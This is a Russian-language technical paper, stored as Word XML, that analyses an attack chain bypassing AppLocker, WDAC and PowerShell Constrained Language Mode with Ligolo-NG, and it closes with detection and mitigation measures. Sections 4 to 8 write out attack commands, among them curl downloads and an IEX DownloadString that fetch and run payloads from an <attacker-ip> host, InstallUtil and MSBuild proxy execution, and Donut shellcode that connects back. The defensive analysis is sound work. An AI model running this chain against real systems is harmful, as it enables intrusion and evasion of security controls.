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Обход средств управления приложениями (WDAC и AppLocker)</w:t>
        <w:br/>
        <w:t>с использованием Ligolo-NG: анализ техники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современных техник уклонения от защиты и их детектирования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анализируется цепочка атаки, демонстрирующая обход средств управления приложениями (разрешённых списков) Windows Defender Application Control (WDAC) и AppLocker. Показано, что контроль приложений блокирует файлы, но не логику исполнения внутри доверенных процессов. Рассматриваются ключевые приёмы — злоупотребление подписанными Microsoft бинарными файлами (InstallUtil, MSBuild), исполнение полезной нагрузки в памяти, рефлективная загрузка кода и зашифрованное туннелирование Ligolo-NG — с соотнесением их с матрицей MITRE ATT&amp;CK. Основное внимание уделено признакам компрометации и мерам обнаружения.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управление приложениями; WDAC; AppLocker; LOLBin; исполнение в памяти; Ligolo-NG; Constrained Language Mode; обнаружение угроз.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WDAC и AppLocker — механизмы управления приложениями (разрешённых списков), предотвращающие несанкционированное исполнение кода: запуск неодобренных и неподписанных .exe-файлов, загрузок из интернета, а также ограничение возможностей PowerShell через режим Constrained Language Mode (CLM). Ligolo-NG — инструмент внутреннего туннелирования, устанавливающий зашифрованные обратные соединения. Основополагающий принцип рассматриваемой атаки: средства контроля приложений останавливают файлы, но не логику исполнения, встроенную в доверенные процессы. Цель работы — проанализировать цепочку обхода с позиции защитника и систематизировать меры её обнаружения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Концепция обхода и соотнесение с MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Вместо прямого запуска неподписанных бинарных файлов атака связывает в цепочку доверенные подписанные бинарные файлы Microsoft, внедрение шелл-кода в память, рефлективную загрузку кода и зашифрованную туннельную инфраструктуру. Общая последовательность: ограничение → проверка → подготовка нагрузки → злоупотребление доверенным бинарным файлом → исполнение в памяти → установление сессии. Соответствующие техники MITRE ATT&amp;CK: T1562.001 (обход AppLocker), T1218.004 (прокси-исполнение через подписанный MSBuild/InstallUtil), T1620 (рефлективная загрузка кода), T1105 (перенос инструментов), T1071.001 (управление по HTTPS), T1090 (прокси).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Испытательный стенд</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Стенд включает атакующий узел Kali Linux и систему Windows с принудительно применённой политикой AppLocker. Используемые компоненты: Ligolo-NG, SharpReflectivePEInjection (рефлективный загрузчик PE), MSBuild (.NET Framework) и Donut (преобразователь PE в шелл-код). Применение политики подтверждается командой gpupdate /force. В приводимых командах адрес сервера заменён плейсхолдером &lt;attacker-ip&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Подготовка нагрузки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Сборка агента Ligolo и загрузчика; кодирование для передачи через ограниченные каналы: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git clone https://github.com/nicocha30/ligolo-ng.git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cd ligolo-ng/cmd/agent &amp;&amp; go build -o agent.exe cmd/agent/main.go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certutil -encode .\SharpReflectivePEInjection.exe loader.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Инфраструктура на стороне исследователя (TLS-прокси и HTTP-раздача файлов):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sudo ligolo-proxy -selfcert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python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Доставка средствами системы (LOLBins)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Передача и восстановление нагрузки выполняются штатными средствами (curl, certutil) без привнесения стороннего инструментария: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cmd.exe /c curl http://&lt;attacker-ip&gt;/agent.exe -o C:\Users\Public\try-agent.exe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curl http://&lt;attacker-ip&gt;/loader.txt -o C:\Users\Public\enc.txt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certutil -decode C:\Users\Public\enc.txt C:\Users\Public\ligolo.exe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del C:\Users\Public\enc.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Прямой запуск при этом блокируется политикой («This program is blocked by group policy»).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Первый обход: прокси-исполнение через доверенный бинарный файл</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Злоупотребление поведением загрузки сборок InstallUtil обеспечивает исполнение внутри доверенной .NET-утилиты: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C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe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/logfile= /LogToConsole=true /U ligolo.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На стороне исследователя прокси Ligolo фиксирует подключение агента (Agent joined).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7. Исполнение в памяти: шелл-код и рефлективное внедрение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>7.1. Преобразование бинарного файла в позиционно-независимый шелл-код посредством Donut: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sudo apt install donut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donut -f 1 -o agent.bin -a 2 -p "-connect &lt;attacker-ip&gt;:11601 -ignore-cert" -i agent.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>7.2. PowerShell-загрузчик запускает в приостановленном состоянии легитимный процесс (notepad.exe), загружает agent.bin, внедряет шелл-код в память процесса и возобновляет исполнение, достигая бесфайлового запуска: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IEX(New-Object Net.WebClient).DownloadString('http://&lt;attacker-ip&gt;/ligolo.ps1')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>8. Второй обход: ограничение режима CLM через MSBuild</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выявлении режима Constrained Language Mode исполнение переносится в полностью доверенную среду компиляции .NET: XML-проект MSBuild со встроенным в блок CDATA C#-кодом компилируется и исполняется вне ограничений CLM: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C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe ligolo-clmbypass.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Появление новой сессии в Ligolo подтверждает успешный обход через прокси-исполнение подписанным бинарным файлом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>9. Обнаружение и меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Поскольку атака опирается на доверенные процессы и исполнение в памяти, защита строится на поведенческом анализе. Индикаторы: аномальные связи «родитель–потомок» (notepad.exe с последующим внедрением), запуск MSBuild и InstallUtil с нетипичными потомками, исполнение InstallUtil над не-.NET сборками, паттерны рефлективного внедрения кода в памяти, исходящие соединения по HTTPS на нестандартных портах (11601). Меры: мониторинг исполнения доверенных бинарных файлов (MSBuild, InstallUtil) и отслеживание process hollowing и инъекций кода средствами EDR; принудительная подпись кода и, где возможно, блокировка LOLBin-ов политиками WDAC; поведенческая аналитика резидентных в памяти угроз; ограничение исходящего трафика по белому списку направлений и портов; журналирование PowerShell (Script Block, Module, транскрипция) и мониторинг обхода CLM; сегментация сети для ограничения перемещения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>10. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Рассмотренная цепочка показывает, что контроль приложений предотвращает запуск файлов, но не логику исполнения внутри доверенных процессов. Последовательный обход уровней защиты (AppLocker, затем CLM) достигается не перебором, а переносом исполнения в доверенные подписанные компоненты и память процессов. Это подчёркивает необходимость эшелонированной защиты, выходящей за рамки разрешённых списков: EDR с поведенческой аналитикой, принудительная подпись кода, контроль исходящего трафика и сегментация сети. Устойчивость защиты определяется сочетанием этих мер, а не отдельным механизмом.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nicocha30. Ligolo-ng: an advanced, tunneling/pivoting tool. GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. MITRE ATT&amp;CK. Impair Defenses: Disable or Modify Tools — AppLocker bypass (T1562.001).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. MITRE ATT&amp;CK. System Binary Proxy Execution: InstallUtil (T1218.004); Reflective Code Loading (T1620).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Microsoft. Windows Defender Application Control (WDAC) and AppLocker design guide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Microsoft. PowerShell Constrained Language Mode and Script Block Logging documentation.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